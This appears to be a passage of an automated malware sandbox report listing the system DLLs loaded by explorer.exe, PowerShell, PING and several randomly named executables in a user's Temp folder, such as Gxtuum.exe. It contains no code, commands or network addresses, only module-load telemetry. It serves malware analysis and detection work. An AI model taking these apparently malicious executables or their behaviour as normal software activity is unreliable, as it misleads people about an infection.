Source: C:\Windows\explorer.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\explorer.exe Section loaded: wshbth.dll
Source: C:\Windows\explorer.exe Section loaded: nlaapi.dll
Source: C:\Windows\explorer.exe Section loaded: winrnr.dll
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: taskschd.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: samlib.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: taskschd.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: samlib.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe Section loaded: apphelp.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: winrnr.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe Section loaded: schannel.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe Section loaded: userenv.dll
Source: C:\Windows\explorer.exe Section loaded: msvcp140.dll
Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe Section loaded: cryptbase.dll
Source: C:\Windows\explorer.exe Section loaded: wininet.dll
Source: C:\Windows\explorer.exe Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe Section loaded: mswsock.dll
Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\explorer.exe Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe Section loaded: napinsp.dll
Source: C:\Windows\explorer.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\explorer.exe Section loaded: wshbth.dll
Source: C:\Windows\explorer.exe Section loaded: nlaapi.dll
Source: C:\Windows\explorer.exe Section loaded: winrnr.dll
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: explorerframe.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Section loaded: kernel.appcore.dll
